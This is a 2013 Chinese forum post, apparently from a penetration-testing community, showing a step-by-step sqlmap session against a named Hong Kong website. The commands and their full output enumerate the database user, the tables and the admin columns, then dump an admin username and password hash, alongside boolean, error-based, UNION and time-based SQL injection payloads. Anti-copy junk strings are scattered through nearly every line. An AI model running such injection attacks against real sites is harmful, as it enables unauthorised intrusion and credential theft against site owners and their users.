中国网络渗透测试联盟

标题: sqlmap实例注入mysql [打印本页]

作者: admin    时间: 2013-4-4 22:18
标题: sqlmap实例注入mysql
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
2 M$ ^' H3 I1 u9 z, W% M" c& Vms "Mysql" --current-user       /*  注解:获取当前用户名称
# ?/ @6 ]) e, K7 c( b. r. ~    sqlmap/0.9 - automatic SQL injection and database takeover tool
4 t, P% r0 Y% i: p    http://sqlmap.sourceforge.net
  • starting at: 16:53:549 S. N. ^9 I9 V7 [5 i" x+ ?/ a
    [16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as# i4 W) o* @4 M4 ~, ~. Y
    session file+ y2 S. [0 \/ g; d/ k& I
    [16:53:54] [INFO] resuming injection data from session file# e; g8 T- c3 P
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    7 j. x1 T( g8 }; P3 n# q% v[16:53:54] [INFO] testing connection to the target url
    0 O8 G  K4 U7 k* L/ Csqlmap identified the following injection points with a total of 0 HTTP(s) reque, F! `& S9 O  W- h& ~$ W0 k
    sts:
    ' O$ r" |6 p7 V( L---
      w6 R! D1 N5 K+ m' m4 x% GPlace: GET% J5 k" ^* p/ O* H* W
    Parameter: id. e$ J3 T' d& U: b+ F- G2 e$ S
        Type: boolean-based blind
    0 A% E( S- w/ h7 d    Title: AND boolean-based blind - WHERE or HAVING clause# p- {5 e6 Q0 u% M2 H6 @9 J, y1 M
        Payload: id=276 AND 799=799" T! k; L% b1 d/ U' V0 I/ r
        Type: error-based
    + m$ r7 W+ t7 M1 B. {    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause; n- a4 w5 Z$ ?6 K" U/ O
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    - H. i3 r! u& M% {' _120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    4 [5 `2 U" a+ S9 u# L7 g),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)# |' c0 J$ D+ _: U! q
        Type: UNION query
      g7 m' o& M5 r. r: m* u    Title: MySQL UNION query (NULL) - 1 to 10 columns
    8 Y$ e1 k5 n3 R2 b    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    $ M5 J9 K8 }' o2 V(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),- P+ `5 w( q2 A, w. f1 u1 W
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#9 x! _+ |7 N# X. ?
        Type: AND/OR time-based blind* g% h4 g( c8 l# T5 d8 [- ^* T
        Title: MySQL > 5.0.11 AND time-based blind' r1 h: L! t9 T. }9 o9 Y1 K
        Payload: id=276 AND SLEEP(5)
    5 p, Y$ P4 O1 v. T6 M. B7 \2 m---9 i0 w2 h4 g, S, Y* O3 c
    [16:53:55] [INFO] the back-end DBMS is MySQL1 G9 M4 _9 o5 l/ \# Z( |
    web server operating system: Windows( b/ y# T9 i' Q& U
    web application technology: Apache 2.2.11, PHP 5.3.0
    # {+ t; M: c6 ?back-end DBMS: MySQL 5.0' P3 i. j4 a+ C. _; [
    [16:53:55] [INFO] fetching current user, e' @; L: V+ z& v
    current user:    'root@localhost'   
    0 r$ {- P$ |/ l3 ?5 k4 d[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    3 L- }9 D1 r. |) ftput\www.wepost.com.hk'
  • shutting down at: 16:53:58
    3 ^# W9 e8 u4 f9 M3 ?4 \) ?1 W$ x% @# Y& f5 y6 p% |
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db4 P* ?/ j4 y7 t% Z' z' d
    ms "Mysql" --current-db                  /*当前数据库/ W& Y9 a/ E, C% j0 V
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    & {7 D. h6 q: n* s* U( D8 y( p8 L    http://sqlmap.sourceforge.net
  • starting at: 16:54:167 f1 T" }& _5 d; m# M- Q
    [16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    3 ~+ C2 [% P/ P; v session file
    6 W( q' B  Q+ c& o5 K! |+ i# b[16:54:16] [INFO] resuming injection data from session file# c8 M, o0 Q. l2 T2 g% A- p3 ]
    [16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    / z! v: W' L& T2 z- F3 W[16:54:16] [INFO] testing connection to the target url" y' {) G5 c" J! C
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque2 ?1 ?. a+ j; p* G" S' h
    sts:2 {3 L  C/ A* f! Q% e( y3 ?
    ---( R. `3 m9 T5 U2 f' G
    Place: GET
    : q$ L2 {; Y1 oParameter: id
    3 ]/ A5 y& S& v. ^3 G8 N  F; d    Type: boolean-based blind+ s$ ~7 g. f4 a) e7 ^$ ]
        Title: AND boolean-based blind - WHERE or HAVING clause! k4 X6 H' t* f" b
        Payload: id=276 AND 799=7996 j0 J% Y/ G4 Y, g; z! y
        Type: error-based
    ( A$ g% j% |# ^    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause$ g/ V- ]- Y0 j; [' m
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,+ r$ Y8 I3 y3 ?
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    . |" m# [$ h1 N* ~4 m),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    : E# u; z6 l3 G8 _2 t    Type: UNION query4 h7 K7 h1 Y' ]
        Title: MySQL UNION query (NULL) - 1 to 10 columns8 K' |5 ~9 P7 x! n) p  D* X' B9 i
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    ; \$ X6 W2 P1 |! P( u(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),8 k! ]9 I+ A: ^
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
      V5 f( C5 X& U( ~4 Q    Type: AND/OR time-based blind& A) c6 w- Y5 ^# D, h
        Title: MySQL > 5.0.11 AND time-based blind" ~( J! ~7 N% W; F
        Payload: id=276 AND SLEEP(5)
    + w* a1 j0 ]5 P# I# K---; b# ^: F* v  t  u5 y* J2 m, }( q' T
    [16:54:17] [INFO] the back-end DBMS is MySQL0 x3 Y1 Q- T# O
    web server operating system: Windows6 x) F5 @6 E/ I
    web application technology: Apache 2.2.11, PHP 5.3.0
    : Z! f' G' r2 jback-end DBMS: MySQL 5.04 B  _/ u2 {5 s! t+ Q% ]
    [16:54:17] [INFO] fetching current database# {2 M& G! U- M/ I& J
    current database:    'wepost'8 }3 P8 t9 @1 Y: f* K0 G' _
    [16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou. a- W0 C, t& z" C- t* v5 C+ g
    tput\www.wepost.com.hk'
  • shutting down at: 16:54:18
    * X4 t; Y2 B. d! l+ A3 O* @. LD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    7 @$ X/ g! o0 Kms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名+ v1 w$ K  p: p' i9 B
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    ! c2 t4 ~7 \+ y0 t    http://sqlmap.sourceforge.net
  • starting at: 16:55:259 I1 \- w3 I6 [& ?
    [16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    1 R1 L/ W. a0 w' p( W session file( Y6 D( Z8 n% ^$ e' b0 V/ T1 R. z
    [16:55:25] [INFO] resuming injection data from session file* j, h# ?/ I' P( ]; C$ E: [3 }; R
    [16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    # f+ n- s0 @- s# \0 R8 q' a[16:55:25] [INFO] testing connection to the target url7 J) }) N+ |# w, S& L
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque/ A! L8 f, _; I  A
    sts:8 g! d. \. ^- H! z. L2 b1 C
    ---
    5 u, j! T3 `2 Z( }Place: GET
    2 O& U8 N" u! o7 v$ v+ O" r! vParameter: id
    , A" k* E+ |" n! q    Type: boolean-based blind  C5 l8 q( V1 f" k0 a
        Title: AND boolean-based blind - WHERE or HAVING clause2 P" s5 F  Q! `# R% ?7 F
        Payload: id=276 AND 799=7998 }8 e& P- Y. O6 [- ]
        Type: error-based
    # ]; ^& b! j& e: |; G& f    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause1 `/ ~6 m* A( f$ g
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,# y2 p! F) [/ A1 }
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58+ F# n) e7 a. v, z1 l/ E& o
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    " ~: U, O7 r  n9 n% T  Y    Type: UNION query
    1 n/ e2 o5 |* C7 p    Title: MySQL UNION query (NULL) - 1 to 10 columns
    1 s6 l7 G+ j: g0 |$ Q7 |: F    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR( r% l$ P$ ^1 c' z, T
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),1 A! N% {  w7 K8 \' V* u
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    + p2 M7 V) b. Q4 U  W8 {    Type: AND/OR time-based blind# ]) p" H2 e6 B+ c$ q: [1 G. ]
        Title: MySQL > 5.0.11 AND time-based blind1 l& J6 y% i* b, H7 C' X9 X' Q
        Payload: id=276 AND SLEEP(5)2 k* S* h% f5 }8 e( w
    ---
    ! D( C9 Z: @1 Q[16:55:26] [INFO] the back-end DBMS is MySQL
    9 J, z6 e+ S4 K3 m' Bweb server operating system: Windows
    ; a" j1 V( t- |; g; W8 Fweb application technology: Apache 2.2.11, PHP 5.3.00 K$ a  K$ ~8 W$ u- w
    back-end DBMS: MySQL 5.0
    2 g4 z% y6 p& z. M0 g' p, [[16:55:26] [INFO] fetching tables for database 'wepost'. X+ f1 x# n- g# A/ h7 {
    [16:55:27] [INFO] the SQL query used returns 6 entries
    9 Q0 f; B) P, T, VDatabase: wepost
    ( t) r$ C" \+ J+ w[6 tables]
    4 [- E" |' U4 b/ v9 q: F6 W+-------------+
    & r0 Q+ X0 p' r| admin       |
    , U1 z& v; p1 w; w0 Z$ @| article     |
    5 J9 ~& [2 W6 T0 O* _- W5 X| contributor |
    8 ?5 k* T0 ]) r- f9 J$ ^| idea        |" k) K; n8 p8 H& f
    | image       |
    ) i) }  V  D1 W' \0 @| issue       |9 X: o- q( J4 M$ R4 k
    +-------------+
    ; ^1 T5 \: e) |) `$ G[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou9 Y  J. W9 t8 O" S
    tput\www.wepost.com.hk'
  • shutting down at: 16:55:33
    2 `* d, {# b6 V$ m" O/ A* W" O1 N0 p: a# [' O5 @
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    ; E+ T8 c4 [) E  O' f( Pms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名& g/ O1 p5 K( w' m: o2 n* r8 d
        sqlmap/0.9 - automatic SQL injection and database takeover tool6 e% T% N. J: O+ u! x. o3 c
        http://sqlmap.sourceforge.net
  • starting at: 16:56:06
    : N. o# b0 w/ J6 \* Q) Jsqlmap identified the following injection points with a total of 0 HTTP(s) reque/ m2 T* }/ ?+ R- t6 l0 Q
    sts:( y2 k2 l3 r4 A. I: h3 E9 }
    ---  {0 y) k& o- }9 h5 ?
    Place: GET) g3 H. {* |! x8 ]
    Parameter: id, Z2 m9 l. u( E: V/ U  X' g* n  ]. R
        Type: boolean-based blind
    5 |8 \1 N4 f! k" i0 d5 ~8 M    Title: AND boolean-based blind - WHERE or HAVING clause
    . u9 r. W, u/ ?2 w  s: S7 e( t# H    Payload: id=276 AND 799=799
    & w) y7 f7 ~' M' x9 V: F  e    Type: error-based
    - I" O8 v& K% T. }6 `6 s$ Y    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    ; A6 _7 g. i+ w/ v    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    2 s0 x& E+ _& b( c5 Y120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    ( S% A, c' R* N% j. n0 U),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a); b; f7 v+ T2 ]
        Type: UNION query
    ' F% G$ R$ m" \( h6 b( p) j& n) u. u    Title: MySQL UNION query (NULL) - 1 to 10 columns& T' O0 U! q. P* R
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR& O7 J2 C2 S" n1 b+ W
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    " d8 X9 w& w! x2 vCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#- m& f1 C, Q' S6 l4 K9 p, {
        Type: AND/OR time-based blind
    ! t5 e8 x# @, s- o! e/ g    Title: MySQL > 5.0.11 AND time-based blind
    4 @5 y) P+ s) y5 I& |    Payload: id=276 AND SLEEP(5)9 i% D/ D4 ~4 O/ B
    ---8 Y* l) z/ y" @4 I5 Z
    web server operating system: Windows7 w  J6 _: h; g8 V5 D: ~
    web application technology: Apache 2.2.11, PHP 5.3.0* @9 A; S# G  z# L# |6 M
    back-end DBMS: MySQL 5.0, Z. {" t7 Q6 S7 V& X& b0 ?
    [16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
    . ]* w- i$ d7 A( p+ R/ Dssion': wepost, wepost
    & f, J! X& {$ q/ d* Z2 s9 y; [7 L6 DDatabase: wepost
    / r5 k! @& K; ]2 s: X3 c! lTable: admin
      b7 ?+ q) [7 N- b' n. L/ }[4 columns]
    8 m" B2 ^- f5 k) ~, B# g+----------+-------------+, O3 m/ R( O9 M% |6 x' d
    | Column   | Type        |
    3 i* z( V' u" p& _+----------+-------------+
    5 }0 t  ~- U9 U| id       | int(11)     |$ G. {6 [- U* X& S. e9 N, `/ d1 s
    | password | varchar(32) |
    9 `# ?  ~* n& y+ J' h: t| type     | varchar(10) |4 m! G2 f/ |4 a7 t
    | userid   | varchar(20) |3 r" N/ a( _8 ]8 d1 w; R- }
    +----------+-------------+
    ; _9 D; B7 u- |: ~
  • shutting down at: 16:56:19
    ; _% {0 S% G6 j3 {6 H% w  P8 S, K+ n" X+ N% x, v" M
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    & Z7 J; J6 Y6 @ms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容  g4 `5 _) g! K. i3 A
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    . Y) n* B. m& Q# I# M    http://sqlmap.sourceforge.net
  • starting at: 16:57:140 f8 l& _0 j+ c' H/ I0 D5 l
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    7 T: _5 c/ b8 u. bsts:' o2 r/ c) k* ^% X0 ~
    ---
      _2 f% y$ |# q  l# v$ BPlace: GET
    1 w! H4 I4 N3 B- MParameter: id
    / ^0 R5 ?) Q% B/ L/ h0 n& T; `' q    Type: boolean-based blind
    8 }3 d$ k9 d! x5 t9 {0 o: y+ X) R1 x    Title: AND boolean-based blind - WHERE or HAVING clause
    : y4 y9 V6 V2 O: ?! Q    Payload: id=276 AND 799=799+ }- ]. x, i0 I4 ]
        Type: error-based4 e4 u& }+ Z7 r! W
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    5 {" I9 c7 D9 S- ^- H    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,* W4 g. U( S! B: q! h4 I8 d+ X
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58! W7 X, R1 @% i
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)4 W9 J, G( }' b; C% l
        Type: UNION query
    ' e' z$ |0 M( z! V: t    Title: MySQL UNION query (NULL) - 1 to 10 columns
    ! p/ R3 k2 e+ j. q4 _    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    % `) o* l9 y/ r( P; d* @(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    : g! T6 i: X# CCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    , q( i2 ?2 e8 q& s5 K    Type: AND/OR time-based blind5 O' q! u3 v, ?
        Title: MySQL > 5.0.11 AND time-based blind- Y, j9 O# s' C: ~  o  l
        Payload: id=276 AND SLEEP(5)  W- L9 D  R9 k( N
    ---
    . G, J9 m6 g: h+ k3 e0 Q3 w! Zweb server operating system: Windows9 @( _& ]  @. J: W; w  j; `
    web application technology: Apache 2.2.11, PHP 5.3.0% d0 f* T; l% ]/ y2 R
    back-end DBMS: MySQL 5.0
    & q: z- b0 O9 y3 k8 f6 ?recognized possible password hash values. do you want to use dictionary attack o) T4 q5 Z. B) x9 S7 Q% @; Q
    n retrieved table items? [Y/n/q] y) `6 b- b' _  w2 B: n
    what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
    : [% X# ]  z9 ~do you want to use common password suffixes? (slow!) [y/N] y/ D: h: g* H$ g! }2 ^& ~% O
    Database: wepost
    , q$ s/ O( o1 I0 ?Table: admin
    8 h' Y7 O' S( ]1 c9 E[1 entry]
    4 ~) c% Q$ m" H- p2 C; c+----------------------------------+------------+) [+ o! M' L; }
    | password                         | userid     |
    : ?3 o0 s  e& e% i' R, e+----------------------------------+------------+
    7 K! U" M3 S: {6 ], R| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
    - Z, P1 ^: |9 P- m+----------------------------------+------------+
    , I/ G+ h% |/ G: b$ e0 {
  • shutting down at: 16:58:149 `7 ?, R; j+ _

    3 Y  n  w, L% A7 u! yD:\Python27\sqlmap>




    欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2